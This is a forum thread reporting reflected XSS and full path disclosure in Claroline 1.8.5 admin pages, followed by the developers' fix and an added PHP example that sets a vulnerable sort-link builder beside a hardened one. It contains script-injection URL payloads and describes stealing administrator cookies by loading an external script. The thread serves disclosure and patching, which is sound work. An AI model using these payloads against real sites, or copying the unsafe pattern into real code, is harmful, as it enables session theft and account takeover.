Claroline XSS [FIXED]


Postby munozferna on Thu Jul 12, 2007 8:33 pm

Full Path Disclosure: 127.0.0.1/claroline185/claroline/admin/adminusers.php?sort=officialCode"><script>alert(1)</script>&dir=4

XSS: 127.0.0.1/claroline185/claroline/admin/adminusers.php?sort=officialCode&dir=4"><script>alert(1)</script>

XSS: 127.0.0.1/claroline185/claroline/admin/advancedUserSearch.php?action=all"><script>alert(1)</script>

XSS: 127.0.0.1/claroline185/claroline/admin/campusProblem.php?view=000000010%22%3E%3Cscript%3Ealert(1)%3C/script%3E


- Fernando Muñoz
munozferna
 
Posts: 13
Joined: Sun Feb 04, 2007 2:44 am

Re: Claroline XSS

Postby zefredz on Fri Jul 13, 2007 8:04 am

munozferna wrote:
Full Path Disclosure: 127.0.0.1/claroline185/claroline/admin/adminusers.php?sort=officialCode"><script>alert(1)</script>&dir=4

XSS: 127.0.0.1/claroline185/claroline/admin/adminusers.php?sort=officialCode&dir=4"><script>alert(1)</script>

XSS: 127.0.0.1/claroline185/claroline/admin/advancedUserSearch.php?action=all"><script>alert(1)</script>

XSS: 127.0.0.1/claroline185/claroline/admin/campusProblem.php?view=000000010%22%3E%3Cscript%3Ealert(1)%3C/script%3E


- Fernando Muñoz


First of all thanks for reporting these issues.

I will open an entry on the bug tracker for these since they show some unprotected variables in SQL requests or php scripts. I will correct them as soon as possible.

Maybe I am wrong, but I think those XSS only work if you are administrator on the target platform (since the admin scripts are only available if you are logged as an administrator). I tried all of the preceding with an anonymous or non admin user and none of them worked.

So they are not really critical since if you are administrator you can do what you want on the platform (get or change user password for example)... so I don't really see why an XSS can be useful for an attacker who is already administrator.

Regards,
Frederic Minne (ZeFredz) - Claroline Team - Claroline.net
zefredz
Posts: 986
Joined: Thu Sep 02, 2004 1:41 pm
Location: Belgium, LLN

Postby zefredz on Fri Jul 13, 2007 8:22 am

Bug opened on the bug tracker: http://jupiter.cerdecam.be/bug/view.php?id=928
Frederic Minne (ZeFredz) - Claroline Team - Claroline.net

Postby munozferna on Sun Jul 15, 2007 6:27 am

It works like this:

1. A non-privileged attacker sends messages or posts in a forum with a link to a page containing the XSS attack code.
2. A user logged in as administrator clicks the link.
3. Now the attacker can steal the administrator's cookies, and probably do other actions with some 'advanced' JavaScript code. For example I could use the XSS to inject the http://wiki-lyrics.com/dokeos/w.js script in the context of the Claroline site; although that script abused some old Dokeos flaws, it's not really hard to make it create a new admin user, delete other user accounts, etc.

Postby zefredz on Mon Jul 16, 2007 8:32 am

Ok, I've got the point

Thanks a lot

Regards
Frederic Minne (ZeFredz) - Claroline Team - Claroline.net

Postby zefredz on Mon Jul 16, 2007 8:51 am

This issue has been solved on the Claroline CVS. We will release a patch or a new version with the correction as soon as possible.

Here are the diffs:

http://cvs.claroline.net/cgi-bin/viewcv ... 1&r1=1.109
http://cvs.claroline.net/cgi-bin/viewcv ... .1&r1=1.45
http://cvs.claroline.net/cgi-bin/viewcv ... .1&r1=1.32

Regards
Frederic Minne (ZeFredz) - Claroline Team - Claroline.net
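The "unprotected variables" zefredz refers to are query parameters that reach both the page markup and the SQL ORDER BY without being checked or encoded. As an added illustration, not Claroline's code and not the content of the diffs linked above, here is that pattern in PHP with a hardened version beside it; the function names, the column list and the meaning of the dir value are assumptions:

```php
<?php
// Added illustration; not Claroline's code. Column names and the meaning
// of the "dir" value are assumptions.

// Before: the raw query parameters are concatenated straight into the link
// markup (and, in the same style, into the SQL ORDER BY). A value that
// contains a double quote terminates the href attribute, so whatever
// follows is rendered as markup: the reflected XSS reported above.
function buildSortLinkUnsafe(string $sort, string $dir): string
{
    return '<a href="adminusers.php?sort=' . $sort . '&dir=' . $dir . '">Sort</a>';
}

// After: reduce each parameter to a known-good value before it is used
// anywhere, and HTML-encode whatever is echoed into an attribute.
const SORTABLE_COLUMNS = ['lastname', 'firstname', 'officialCode', 'email'];

function safeSortColumn(?string $sort): string
{
    // Only an allowlisted column name may reach the ORDER BY clause.
    return in_array($sort, SORTABLE_COLUMNS, true) ? $sort : 'lastname';
}

function safeSortDirection(?string $dir): string
{
    // Assumption: dir=1 means descending; anything else is ascending.
    return ((string) $dir === '1') ? 'DESC' : 'ASC';
}

function buildSortLinkSafe(?string $sort, ?string $dir): string
{
    $column  = safeSortColumn($sort);
    $dirFlag = safeSortDirection($dir) === 'DESC' ? '1' : '0';
    // ENT_QUOTES encodes both " and ', so no value can close the attribute
    // early; & becomes &amp;, which is the correct form inside an href.
    $href = htmlspecialchars('adminusers.php?sort=' . $column . '&dir=' . $dirFlag, ENT_QUOTES, 'UTF-8');
    return '<a href="' . $href . '">Sort</a>';
}

// Usage: $_GET is untrusted even on admin-only pages, because an
// administrator can be lured into following a crafted link (as the
// thread explains), so the same validation applies there.
$orderBy = safeSortColumn($_GET['sort'] ?? null) . ' ' . safeSortDirection($_GET['dir'] ?? null);
// $sql = 'SELECT ... FROM user ORDER BY ' . $orderBy;
echo buildSortLinkSafe($_GET['sort'] ?? null, $_GET['dir'] ?? null);
```

The same two steps (allowlist what goes into the query, encode what goes into the markup) also remove the full path disclosure, since an unexpected sort value no longer reaches the database layer and cannot trigger the error that leaks the path.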
